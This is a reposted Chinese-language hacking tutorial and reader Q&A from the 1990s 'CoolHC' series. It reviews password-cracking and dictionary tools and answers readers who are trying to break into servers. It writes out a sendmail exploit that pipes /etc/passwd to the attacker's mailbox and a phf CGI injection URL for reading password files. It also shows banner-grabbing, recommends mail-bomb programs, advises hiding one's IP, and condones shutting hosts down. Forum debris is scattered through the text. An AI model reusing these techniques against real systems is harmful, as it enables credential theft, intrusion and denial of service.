這不是一個教學(xué)文件, 只是告訴你該如何破解系統(tǒng), 好讓你能夠?qū)⒆约旱南到y(tǒng)作安全的保護(hù), 如果你能夠?qū)⑦@份文件完全看完, 你就能夠知道電腦駭客們是如何入侵你的電腦,我是 CoolFire, 寫這篇文章的目的是要讓大家明白電腦安全的重要性, 并不是教人Crack Password 若有人因此文件導(dǎo)致惡意入侵別人的電腦或網(wǎng)路, 本人概不負(fù)責(zé) !!寫這些文章真的花了蠻多時間的, 我也沒辦法確定甚么時候可以寫好下一篇, 所以沒有辦法預(yù)告, 因為預(yù)告不準(zhǔn)的話會挨罵的. 以後寫 CoohHC 的時間會少很多的, 因為工作越來越多的關(guān)系, 希望大家見諒, 如果一兩個月才出現(xiàn)一篇的話也不要罵我喔~ 如果你曾經(jīng)用印表機(jī)把這些文章一篇篇的印出來的話, 你就應(yīng)該知道寫這些東西有多辛苦了,上次在朋友那邊看到, 差點吐血!2 `# W- o: J6 n4 i- b* t1 X
事實上, CoolHC 寫到這里已經(jīng)沒有甚么可以多講的了, 因為有很多東西并不是用技巧來破解, 我們所使用的都是系統(tǒng)的漏洞. 而這些漏洞, 有些由於已經(jīng)出現(xiàn)了很久, 所以有些網(wǎng)站也已經(jīng)更新了這些問題, 你就沒有辦法得到你所預(yù)期的結(jié)果了. 除非你能夠在他們 Patch 之前先進(jìn)入, 所以就必需要取得最新的 Bugs 資訊.
K5 T5 p* Y. b! f# h在網(wǎng)路上有很多系統(tǒng)安全討論的 Mail List, 這些 Mail List 討論的內(nèi)容大多與各系統(tǒng)的安全性有關(guān), 所以在討論內(nèi)容上也都會圍繞著新的 Bugs 打轉(zhuǎn), 如果能夠善加的利用這些資訊, 相信你可以在得到新的 Bug 資料時就輕易的拿下很多網(wǎng)站的密碼檔案.: B, o' q" r) ^/ c y$ F+ v
所以在這一期的內(nèi)容上, 我們就以如何訂閱這些 Mail List 為主題, 讓大家能夠吸收到這些新的資訊, 這樣也不會等到 CoolHC 寫好的時候, 大多數(shù)的 Bugs 都已經(jīng)補(bǔ)上了.
; K, r& W' \# x6 x**** Crack 工具 ****; z7 e- I' n7 P- b$ k! x
[JackAss V1.1]
e2 v, ^: o: j, m8 O許多網(wǎng)友最喜歡的就是這一篇了, 所以這一篇好像是少不了的, 但是軟體更新的速度事實上可能沒有我們的文章快. 上次介紹的 John the Ripper 1.3 大家用了覺得如何???有沒有甚么大問題呢? 應(yīng)該還不錯吧! 這次要介紹的是 JackAss V1.1 是我剛在國外網(wǎng)頁上抓回來的, 也不知道出現(xiàn)了多久, 看一下檔案日期是 4-09-96, 好像已經(jīng)出來很久了, 都沒有注意到它的存在.
/ c1 d# h* l/ i. @' k/ E 一般我們以 CJack 來破解密碼檔案的時候, CJack 是以呼叫字典檔, 然後逐字加密再進(jìn)行比對的方式來作解碼的動作, 所以并不是所有的密碼都找得到, 所以就有人想出以暴力的方式來解碼, 前題是機(jī)器夠快, 然後時間夠多, 才能避免浪費掉很多系統(tǒng)的時間.CJack 在設(shè)計的理念上就是這樣, 所以基本上還是略顯不足, 所以才會有很多的輔助工具出現(xiàn), 像先前幾篇我們所介紹的 KOS 就是一個例子.
9 t1 Q1 E! R! r( z0 Z! q$ d* } JackAss 基本上是一個輔助 Jack 的工具, 跟 KOS 一樣, 需要有 CJack 才能夠執(zhí)行,他的英文注解是: Add On For CrackJack, 與 KOS 不同之處是: KOS 對 CJack 的不足處作了補(bǔ)強(qiáng),讓 CJack 可以跑出一些大小寫數(shù)字混合的密碼, 而 JackAss 則是一個完全不同的方式, 他不需要使用任何的字典檔, 因為它本身就是一個字典檔產(chǎn)生器. 當(dāng)你使用 JackAss 來作為 CJack 的前導(dǎo), 執(zhí)行 JackAss 之後他會依照你的選項來制造出字典檔, 然後再呼叫 CJack 來跑這些字.試了一下 JackAss 似乎功能上不怎么樣, 有點類似國內(nèi)上次出現(xiàn)的那支密碼破解程式,不過速度上倒是比較快, 如果你是要用暴力法來破解, 又有幾臺不錯的機(jī)器, 你可以試著在不同的機(jī)器上跑, 這樣速度會快一點, 如果單用一臺機(jī)器要跑暴力法, 可能就很累了. 當(dāng)然, 如果你可以只跑單一 User 的話, 速度會快一點, 所以我建議拿 JackAss 來跑 root 的部份, 其它的用 GlobalKOS 來跑字典法就行了~~ 不要那么累!
. H9 O+ R/ o9 Z; t 之前在 tw.comp.security 看到有幾位網(wǎng)友在討論解碼的文章, 其中有一位網(wǎng)友的觀點跟我的有點相像, 他的說法是: 將所有的字典檔先編碼, 存成一個大型的資料庫, 當(dāng)你抓回密碼檔的時候, 直接用密碼檔來作逐行的比對, 這樣速度上會快一點, 因為省去了編碼的時間. 如果有人要作這樣的程式的話, 我想應(yīng)該要有一個不小的硬碟, 用來儲存這個完成後頗大的資料庫, 然後查詢方面最好是用 SQL 來作查詢, 速度上應(yīng)該會快一點因為在其它的查詢方法上, 如果資料庫非常龐大, 可以系統(tǒng)跑起來會像當(dāng)機(jī)一般吧?? 再者機(jī)器的速度應(yīng)該也要夠快, 最好呢, 能夠?qū)懗鲆粋€ CGI 來 Call 這支程式, 讓大家可以在網(wǎng)頁上丟出 passwd 檔來查詢, 再將查詢完的結(jié)果寄回電子郵件信箱中. 這看起來好像有點神話, 其實這很容易作到的, 只是沒有人真的這樣作, 是嗎?? 目前還沒預(yù)估過這樣作所須要的主機(jī)配備, 大家有空的時候幫忙想一想吧??
& g2 f* t/ r8 V0 w+ l/ b [WordList V1.0]. s4 A0 Q% \+ |& w3 ^. l( s: |9 N8 S
這個程式是一支字典檔產(chǎn)生器, 他能產(chǎn)生五個字的字典檔, 就是排列組合啦~ 也沒有用甚么特殊的方法, 使用他來產(chǎn)生字典可以產(chǎn)生一個相當(dāng)大的字典, 不過速度上相當(dāng)?shù)穆褪橇? 這種程式所產(chǎn)生的字典有點暴力, 因為他跟本不依照字典的方式來產(chǎn)生, 但是所產(chǎn)生的字也就相當(dāng)?shù)目捎^, 不過只要密馬是五個字的, 都一定逃不過~ 屬於暴力法的一種. 速度慢? 慢到甚么程度呢? 你親自的試一下就知道了, 我跑到一半就把它停掉了,不曉得是用甚么語言寫的, 還 For Win 3.x/95, 純 DOS 下無法執(zhí)行. 除了速度慢的缺點之外, 這支程式所跑出來的字典檔是五個字的, 我覺得真對五個字的密碼來作解碼是有點暴力, 不過大家應(yīng)該把自己的密碼弄長一點, 因為之前我破解的一組密碼, 居然有人用一個英文字元來當(dāng)密碼, 系統(tǒng)管理人員應(yīng)該將密碼設(shè)定最少四個字元, 這樣密碼才不容易被人盜用, 不然就將系統(tǒng)安全作得好一點, 不要讓人輕易的拿到 passwd 檔.
% j& H# J y# t& p& u[Q1]
. U5 m- \, l: s+ m |我一進(jìn)去的目錄是"/",我用ls指令後都沒有看到資料夾,有沒有可能是把/etc/passwd隱藏了呢?我進(jìn)去時先出來的畫面: 220 flag12 Microsoft FTP service (Verision2.0)我又用了anonymous.ftp.這兩個username進(jìn)去,也成功了而且目錄也都一樣,那有沒有可能passwd不放在這里?
% v0 q) n% L. B/ X6 p% T Y[A1]因為一般我們在找 password 檔的時候, 我們測試(實作)的 Server 都是使用 Unix 的 Server來作, 所以我會寫是 /etc/passwd, 照你這個情況看來, 你進(jìn)入的 FTP Server 應(yīng)該是 WindowNT 的系統(tǒng)(我也沒有把握能夠確定這件事), 如果是這樣的狀況的話, 一般的 WinNT系統(tǒng)是不會有 /etc 這個目錄的, 自然也就無法用 ls 指令看到了!
8 p% h2 @8 N7 B9 G5 ^/ M" K[Q2]我覺得知道某人的IP又能怎樣呢? 現(xiàn)在ISP都是使用不固定的IP呀? 若你說有紀(jì)錄呀?可是像我使用非自己的或是免費的呢?像我的網(wǎng)頁就有告訴人家免費上網(wǎng)(中研院提供的)查到IP也沒用呀?為何還需要用E-mail bomb 的隱密IP呢?我實在想不通, 可以告訴我嗎?$ U! ]0 t/ d7 R4 {8 v4 k8 f
[A2]對呀!! 但是如果該主機(jī)可以查出該 IP 的確實上線時間 (有 Log 檔可查)另外也可以再經(jīng)由電信系統(tǒng)查甚么時候撥到哪支電話的電話號碼, 循線就可以逮到你了~ 但是現(xiàn)在電信局不太管這樣的事, 不過如果你犯了很大的錯, 有檢察官要求他們查, 你說查不查得到 ????? IP 固不固定又很重要嗎 ??? 還是能 Fake IP 是最好的~~ 把 Ping關(guān)掉??呵呵~~ 想通吧!+ z C N+ W, R
[Q3]1.I can't download KeyPro Emu'. I think the location is wrong. Can you send itto me?5 o4 J5 |8 @" g
2.嗨...,UpYours3還是傳不下來...能否告訴我其他地方哪里有? or用別的方法寄來?(真的!沒騙你,我每次下載到1.xMB時,就會卡住,都不動了...)+ R' P" U# Z- ?" w. p
[Q7]
; X) O8 e! X6 ^( A你知道嗎?news上俞煌男有寫一個程式是sendmail 收到password to you know?你是否也有同樣的program?and letmein 2.0不知進(jìn)展如何?
7 ?& j& l% U; E: u6 D[A7]呵呵~~ Know How 是不是?? 其實要看他寫出來的東西是針對哪個 Sendmail 版本啦, 像很多版本的 Sendmail 都有被人家抓出一些 Bug 出來, 那也要看這個 Bug 的危險性到甚么程度,一般這些東西都會有人整理出來, 但是如果 Mail Server 使用的剛好不是Bug 有列出來的話, 你可能也沒有辦法了吧?? 我舉一個很久以前在 Bugtraq 上面看到的 sendmail bug 來作說明好了, 這個 Bug 的版本我忘了, 好像是 sendmail 5.6 的吧(很久了), 現(xiàn)在不曉得還有沒有人在用這個版本, 如果有的話, 就算他倒霉好了! 是這樣的, 這個版本的 Sendmail 可以讓人執(zhí)行一些指令, 所以我們可以利用這個漏洞把passwd 檔寄給自己, 而連到 smtp 就可以控制 sendmail 來發(fā)信了!
; V; w/ P8 |8 b" f) t4 ltelnet xxx.xxx.xxx 25
3 @$ `" D |' T' b5 c7 Y; mhelo MyDear2 ^2 M3 A" D" l( w+ | c
mail from: "|/bin/mail me@myhost </etc/passwd"
$ Q% \% u; B/ s' p. ~rcpt to: me@myhost; H) p. m$ t7 A3 ?% F% w' S0 s
data. V8 G; p. J# {" q' h/ @$ p
this is a test mail .
2 i9 y# n) [0 v; v6 {0 d3 J像這樣就可以讓這臺主機(jī)把他自己的 /etc/passwd 寄給我了, 但是也要看他有沒有提供mail這支程式, 有沒有放在 /bin 目錄, 像這目錄也是很重要的, 有的例子我舉出來像cgi hole 我是舉例他放在 /cgi-bin 目錄, 但有些人的目錄名稱是 /cgi 或 /bin 或/exe 就沒有人會變通, 一直寫信來問我, 為甚么照這個指令沒有辦法抓到... 等等, 很難講啦, 誰曉得他們目錄命名的方式,都是隨人家高興的嘛~~9 V2 u+ a, l' R
不過像你所講的, 把這種 Bug 寫成程式來抓 passwd 檔, 那是不是要針對很多版本的sendmail 都要有判斷? 再針對每個版本送出不同的指令? 如果真的可以寫出來這樣的程式的話, 那一定是很不錯, 不過這應(yīng)該還只是一個理想吧?? 俞兄如果有寫好的, 請寄送一份給小弟, 我倒想看看程式可以強(qiáng)到甚么程度. 還有, 并不是每個 sendmail Bug 都是連上 smtp 就可以作了, 有些還要寫一些小程式 (Scripts) 才跑才有用, 也就是說你必需要有一個 login 到該 server 的帳號才行.... 所以..... 難說啦!3 o4 k1 J D# r% a' ]
8 ?( o' W! T' R. o/ o
[Q8]
; N/ ]% L* m# WI already download avalanche v2.8 mail bomber,but I can't send it! When I start send the bomb massage,why always receive 553 error ot other error?can you help me how to seng it! + d* _7 s* x# x+ V
[A8]有些 MailBomb 我并沒有實際的測試過, 因為種類實在太多了, 現(xiàn)在好像越來越多人喜歡寫這種程式, 如果你有類似的問題, 可以到我們首頁上的留言版發(fā)問, 相信有用過的網(wǎng)友會提供你一些設(shè)定上的建議, 讓你的程式能夠正常的運作.( J" h5 n, N' |0 X
[Q9]Hi, I read your hack homepage, it's very good. Do you know any BBS or sitesabout system security & hacking? They are always underground, I can't findthem.Thanks alot.7 p4 n& h# N# T( e) o
[A9]目前中文的 Hack Homepage 大多都是關(guān)於軟體注冊碼的網(wǎng)站, 有些網(wǎng)站現(xiàn)在也會提供一些關(guān)於破解主機(jī)方面的資訊, 我們將在首頁上建立一些網(wǎng)頁的連結(jié)點, 讓網(wǎng)友們可以到其它的網(wǎng)站上看看其它的破解資訊, 如果你有建立一個相關(guān)的網(wǎng)頁的話, 請寫信給我,我會將你的網(wǎng)頁加入我們站上的連結(jié). 至於 bbs 的話, 各大專院校的 bbs 應(yīng)該都有Hacker 區(qū)的討論, 目前國內(nèi)以交大資工的 Hacker 區(qū)資料最為豐富, 你有空也可以上去看看. bbs.cis.nctu.edu.tw
$ }% X% Y( l$ i( l( |) o[Q10]很冒昧的打擾你��,小弟拜讀你的大作中 coolhk2 時�����,便實地的操練了一下�,當(dāng)小弟在瀏覽器中下達(dá)∶, c+ v4 c" M. f( q$ w; [3 D- ~
ada99:xxxxxx\cgi-bin\nph-test-cgi@_2A
# Y0 F# l; l2 c$ B# m7 T後��,誠如你所說的一份報表出來如下∶ + R1 `5 X5 j5 ~# d: p' E2 T
CGI/1.0 test script report:
6 _' h* T0 X: i$ b: Rargc is 1. argv is \*.& L' Y) V2 O$ H6 \5 d( B
SERVER_SOFTWARE = Apache/1.0.0
1 o' s- R1 @& V* z V% FSERVER_NAME = auto.nypi.edu.tw
6 ]+ F) j: w, B5 EGATEWAY_INTERFACE = CGI/1.1
; [4 r6 q; f: \' a& E3 C1 g# m8 rSERVER_PROTOCOL = HTTP/1.0
* |2 q& l4 x6 zSERVER_PORT = 807 b$ {9 Y: E& v7 X1 b
REQUEST_METHOD = GET
" |1 A+ f$ K- u p" N6 wHTTP_ACCEPT = image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,*/*7 f+ ~( [; v' S& @
PATH_INFO =
9 v& p* O- F$ e# {( @PATH_TRANSLATED =
! F5 X8 m7 t# }SCRIPT_NAME = /cgi-bin/nph-test-cgi. y* P+ V& U7 G- B# ^, K! j1 @! U
QUERY_STRING = 2 Count.cgi acc acc.c archie calendar count date discuss doit.cgi dopost.c u( Z y4 \% n
finger fortune guestmsg guestmsg.c imagemap jj move.pl nph-count nph-test-cgi phf post-query 6 I* {; Z" g' y% u) }
post.c query ranking re.c repost.c repost.c.bak test-cgi test-cgi.tcl uptime vote.pl wais.pl, T* X. U" N w6 h; k& b8 x! p
REMOTE_HOST = 140.130.1.218
- q4 ?1 s' e' \. L4 hREMOTE_ADDR = 140.130.1.218
8 P& m! l7 \4 LREMOTE_USER =
1 e0 \' A* @, g* D1 p CCONTENT_TYPE =
/ `& l. M1 I- \% o) S! A! E9 [, iCONTENT_LENGTH =
' v8 X+ P# P& j! f5 d但是當(dāng)小弟再接著輸入∶" X6 @( e' L0 t5 T
http://xxxxxxxx/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd
8 m. F/ o; Q. S( ?) V0 g/ M可是卻沒有 passwd 出現(xiàn)��,僅出現(xiàn)如下∶9 }& S2 |/ M$ ^$ E
Ⅰ.
4 R* j( k' a3 |+ c' C! ]) PServer Error4 S+ k4 L( z4 x Z& i2 O) S
The server encountered an internal error or misconfiguration and) ]* o* \- h& w; b; F8 c6 Z
was unable to complete your request.
8 f, @ }1 ~' s0 ]" K$ P# ~Please contact the server administrator, allen@auto.nypi.edu.tw and
# y1 P0 O+ P* n2 Q: l) cinform them of the time the error occurred, and anything you might have3 i+ K0 t- q, S7 r/ O
done that may have caused the error.
, ^1 v& @/ g O3 rⅡ.2 v! h8 q& V. S& N* v3 G+ x/ W
Query Results2 h3 P9 B; }( [! c' N! e5 u
/usr/local/bin/ph -m alias=x less /etc/passwd / X% \! z! m1 D3 Z
上面的 Ⅰ及Ⅱ 是小弟分別在不同的站所試出的結(jié)果��,請問一下為什么會如此呢�,是不是小弟指令下錯了或者是該站的軟體已經(jīng)把 bug 給 patch 過了,謝謝你��!0 b- O2 ?3 M- g" K+ R' p6 f: e: p
[A10]正如你所說, 可能這個站臺已經(jīng)把他們的 httpd Patch 過了, 所以沒有辦法拿到, 也不一定要用 less 指令, 也可以用 more, cat 等指令來試看看, 你上面所下的指令應(yīng)該都正確才對,如果真是已經(jīng) Patch 過了的話, 就只好試試看系統(tǒng)有沒有其它的漏洞羅.這個漏洞主要是系統(tǒng)所提供的 phf 的 bug, 有些主機(jī)在 test-cgi 的 Report 上的 QueryString 那一行沒有 phf, 也就表示這臺主機(jī)沒有提供 phf 這個 cgi 讓你使用, 也就沒有辦法用這個方式來取得 passwd 檔了.
0 F1 r/ i0 D5 _. X
" c0 X& v# N3 {7 p& ^' \$ ^4 F% W[Q11]1. Can you tell me how to find the KOS file by YAHOO.The best of idle is tellme the FTP site.Thank you. :)
2 j7 L( M8 q% _- u V, n3 V6 q2.我給您發(fā)完信后���,想從您的首頁上拉個CJACK14下來���,發(fā)現(xiàn)上面好象沒有耶 我點取了那個名字,可是報告說沒有這個文件。 (~~~~~~~~~~~~不會是沒有吧- e9 h$ d3 N/ O2 V" M [
[A11]你現(xiàn)在已經(jīng)可以在 ftp.cads.com.tw/pub/security 中拿到這個檔, 這是由網(wǎng)友 Robin所提供的ftp, 站臺上許多程式都可以在這里抓到. 如果你在我們站臺上抓不下來, 請到這里試試, 如果你想在 Yahoo 上找的話, 尋找 globalkos 這個關(guān)鍵字, 可以順便連到國外的站臺看看他們擺了哪些東西, 亦可順便學(xué)點東西喔~~
( O, G6 X U8 l6 b. ~% D[Q12]Can you tell me how to check infomation of host? How to know the FTP serverand MAIL server?
. y3 D9 K! ~; Y1 O6 H+ c[A12]對, 有很多網(wǎng)友來信詢問如何破解某某站臺, 如何破解.... 都沒有順便說明一下你們想破解的系統(tǒng)是屬於哪種系統(tǒng), 先教大家看一下系統(tǒng)名稱, 你只要 telnet 進(jìn)入, 當(dāng) Unix提示符號出現(xiàn)的時候, 用 uname -svrmn 就可以看到了, 各選項代表的意義如下說明:
5 E3 {6 F) U9 ~-s: Show System Name, -v: Show Operating Version, -r: Reveals The Software Release Level-m: Identifies The Machine Hardware For You -n:The node name of the computer is revealed
1 P/ m! i- K/ j y0 w另外再來說明一下如何看 Sendmail 版本, 我們只要連到 Port 25 就可以看到了, 如:
4 ]3 v$ ~6 d% s1 r8 z6 o* rtelnet ms1.xxxxxxxxx.xxx.tw 257 r8 a0 j$ h& C9 `/ E: C" ?
220 ms1.xxxxxxxxx.xxx.tw Sendmail 5.65v3.2 (1.1.8.2/30May97-0801PM) Fri, 6 Jun 1& s6 p4 n& b+ r4 u+ S6 |" [
997 11:38:23 +0800 Y' f) F2 Q8 T; m
至於 ftp 呢? 你只要連上 ftp 就應(yīng)該會在畫面上看到他的版本名稱了, 如:
. g+ w0 o. E( u5 gC:\WINDOWS>ftp ftp.xxxxxxxxx.xxx.tw/ I: h; e4 q6 [0 L) P. n* P7 g
Connected to ftp.xxxxxxxxx.xxx.tw.! g9 Y# J5 U9 r( I( x9 c
220-Serv-U FTP-Server v2.2 for WinSock ready...
% {3 y, s0 w9 _220-Welcome to xxxxxxxxxxxx xxx Ftp Server(ftp.xxxxxxxxx.xxx.tw).( ]6 I* T/ _; ]9 B
220-From xxx.xx.xxx.xx& } y& i% \ x9 \2 Q, L
[Q13]請問你能否告訴我如何制造mail bomb,因為最近老是收到廣告信或者有的沒有的,實在很8 Y( ?9 i4 w: {1 E2 {7 q5 c
討厭.
) ~9 C0 x2 n& \8 z9 |9 B[A13]首頁上有一堆Mail Bomb 的程式, 你需要的只是把他們抓下來, 然後在電腦上跑就行了,當(dāng)然里面也都有說明檔之類的文件. 在收到廣告信件的時候, 請不要一昧的回信, 因為有些發(fā) MailList 的人, 對系統(tǒng)的運作并不 解, 有時可能是利用在帳號目錄設(shè) .foward的方式來發(fā)信的, 而信件中的 Reply to: 欄位填的也是該帳號, 當(dāng)遇到這種情況的時候,你所發(fā)的信會讓所有在這個 MailList 的人都收到, 如果所有的收件人都回這封信的話,那你的信箱一定就爆爛了! 所以要先冷靜的分析一下這封信的發(fā)法, 會不會傷害到別人,再決定要怎么辦, 千萬別亂炸!~ MailBomb 也會害到自己的, 切記~
& f6 A8 B4 ^+ ^/ Y' _: n[Q14]您好���!我是XXXXXXXXXXXXXXXXX?���?�!對於您寫的TXT2DIC 有一點問題�!為什么所建的密碼檔PASSDICT不會增加!只是每增加一次字典����,PASSDICT會隨著不同!
2 Y" d) n1 K3 ~8 D7 @[A14]TXT2DIC 的產(chǎn)生方式會覆蓋掉舊有的檔案, 所以請在使用的時候使用不同的檔案名稱,目前最新的 TXT2DIC V1.2 也還沒有使用 File Append 的方式, 所以仍然會將舊檔案覆蓋, 若你不想覆蓋舊檔, 請使用不同的檔名來進(jìn)行轉(zhuǎn)換! 否則程式將不會給你任何的警告就把檔案蓋下去了!) {- H7 o+ _* K4 {) _
; y2 W3 ~: E5 _1 I[Q15]在網(wǎng)路閑逛時發(fā)現(xiàn)FETAG Software's Hacking Page像發(fā)現(xiàn)寶一樣的下載了Coolhc#1-6����,在以前電影、小說所描述的駭客情節(jié)�,以為只有在外國才有的事,想不到在臺灣已有人在這片領(lǐng)域默默的耕耘���,雖然我不是很聰明但還是很有興趣的想出點力�。拜讀你的大作似乎有點意猶未盡�,想請教你什么時候再出第七集����,坊間有什么中文的入門書可參考的�����。還有想當(dāng)一個駭客族會不會很難�。
2 b% P# e7 ]- M3 Y! U: q5 A. B" L[A15]謝謝你的鼓勵, 7 跟 6 之間的確是隔了很久, 且這一篇也沒有講到甚么東西, 有點對不起大家的等待了. 若想要學(xué)入侵, 希望各位能多看一看 Unix 方面的書, 先將 Unix 的指令讀熟, 最基本的當(dāng)然就是 Shell 指令, 再來就是學(xué)著寫一些簡單的 Shell Script,若沒有馀力自己找系統(tǒng)的漏洞, 又想要破解站臺, 建議要多看看一些系統(tǒng)安全的 MailList, (好多老話重談), 這一篇就針對 Mail List 的部份, 有簡單的介紹, 讓大家對這些系統(tǒng)安全的 Mail List 有些 解, 進(jìn)而多吸收一些知識.
, Y N5 f3 h: d0 T[Q16]我想請問一下,我是用Browser抓/etc/passwd的���, 面root的密碼是被編過碼的嗎���?我用Crack Jack 1.4解碼���。但是好像不行�����,到底要用什么解才對�,一下用Crack Jack,一下又用Brute�,我都看不懂,還有就是UltraEdit是什么����?Pass2Dic有用嗎����?還有我用NetTerm 4.1版for win31可是ftp or sendmail好像都進(jìn)不去�����,是什么原因呢�?另外就是我用CuteFtp 1.8版,Login設(shè)anonymous or Double���,ID和passwd都空白���,但是為什么就可以進(jìn)Ftp,然後用NetTerm卻進(jìn)不去? 還有KOS(1.?M)的不會用��。
9 G' O( ^, \/ A8 `/ T[A16]好多問題喔~ 我一一的簡短回答:[1]要看 Passwd 是否是編碼過的, 在 CoolHC#1 中就有說明, 我沒有親眼看到 passwd 檔, 沒有辦法回答. [2]CrackJack 跟 Brute 都是功能相同的程式, CrackJack 速度比較快, 請你先看一下 CoolHC1~6 之後再發(fā)問, 因為有很多東西都是寫過的了! [3]UltraEdit??? 文書編輯程式, 我用它來寫 Home Page [4]Pass2Dic在 CJack 上已經(jīng)有選項了, 但是在 Brute 之類的成式上就用得到. [5]ftp 有提供匿名登入, 但是在 Telnet 沒有, 所以無法登入. [6] KOS 的用法也寫過了!9 }" `# |# \" v; z" ~2 F7 |
[Q17]when i use txt2dic.exe , i can't use it first, when i go into the third stepit show " incorrect dos version....done!" secondly, when i gp into the fourthstep , it show" have some error on code-62 "what's wrong ?, N; _8 P3 E& m* ~1 t }+ C0 [& \$ Z
[A17]第一個問題, 在第三步驟發(fā)生 Incorrect dos version, 你用的是 1.0 版, 所以需要呼叫到 dos 的 sort 程式, 請使用 1.2 版 (For Win32 only) 就不會有此狀況了! 二,你發(fā)生 Error 62 的狀況, 這在上一次的 FAQ 中也有講過了, 請去翻一翻就 解了! 不過這個狀況也在 1.2 版改進(jìn)了, 所以建議還是用新的版本, 就不會有這種狀況發(fā)生了! % d8 o+ v# a' x$ q, m7 s1 }
[Q18]When I get a passwd file which is shadowed....Please tell me how to do....
. u+ P& |' P! d$ P[A18]如果我跟你講, 無解呢?? 有些 shadow 過的檔, 只要你有辦法抓到另外一個 shadow 檔是有辦法解開的, 但是單要使用 shadow 過的檔, 我不相信有人能夠解開~ 所以還是要抓到另一個來 "配對" 才有用! 至於如何抓到 shadow? 很多人都有這樣的問題, 那就要看系統(tǒng) "提供" 的漏洞多不多了, 不然它 shadow 也就沒有意義羅! 7 e% k& @/ D ~& ?
[Q19]First of all, I'd like to give you some feedbacks about your page.I'm not in Vancouver. I always encounter the slow transfer rate with manyTaiwanese sites. I only got 30 bytes/sec with your site. I don't know thereason... Anyway, you are the first Chinese hacking page I've ever seen.I like that. I just want to learn more. Could yu give me some Chinese hackingpages' addresses? I will be glad to visit them. By the way, I'm not intersetedin emailbombs, because they hurt others. But I'm interested in defensing andcracking emailbombs. I hope you can update your page oftenly. Thanks a lot!3 N. e6 ^' I2 y: r$ _# v5 D/ @& c( x) ^
[A19]謝謝你, 我們會盡量的更新我們的網(wǎng)頁, 至於其它中文的類似站臺??? 嗚... 你們在哪里呀?? 快點現(xiàn)身吧!! 如果大家有找到新的類似站臺的話, 寄得趕快寫信來告訴我呦~ ' h5 k. U: \+ z. h) r
[Q20]請問我ISP的OS是SunOS5.4���,我用貴站上的方法不好用了�����,用貴站關(guān)于shadow的link上提到的也不成了�,要如何取得其shadow過的passwd呢?請賜教�����,多謝�!
( V& Q. }0 U( `- V/ V[A20]喔~~ 對了! 剛才忘了講, 如果各位已經(jīng)試過幾個 Port, 解自己系統(tǒng)的版本編號, 使用的 Sendmail 版本, ftp 版本等的話, 你們可以到 http://underground.org 去看看, 點選左邊那個 Bugs, 然後選一下你所知道的系統(tǒng), 他會列出一些目前所知的 Bugs 出來, 然候你就可以依樣畫葫蘆啦, 不過那些訊息都是英文的啦~~1 _5 _. C3 c# R# _
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* 8 f3 [* d2 ?4 G4 E/ Q
再次重申, Crack 別人站臺之後不要破壞別人站臺中的資料, 此篇文章僅作為教育目的,不主張你隨便入侵他人主機(jī).... (高-Net 還是除外)... 請勿將這類技術(shù)使用於破壞上(又... 如果第三次世界大戰(zhàn)開打, 你可以任意破壞敵國的電腦網(wǎng)路... 我全力支持),最嚴(yán)重的情況(如果你真的很討厭該主機(jī)的話)... 就將它 Shut Down.... 好了! 別太暴力了!
# v" u' y( U* b+ S* w
. C4 H' ] Y4 s |
發(fā)表于 2011-1-12 16:29:26
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡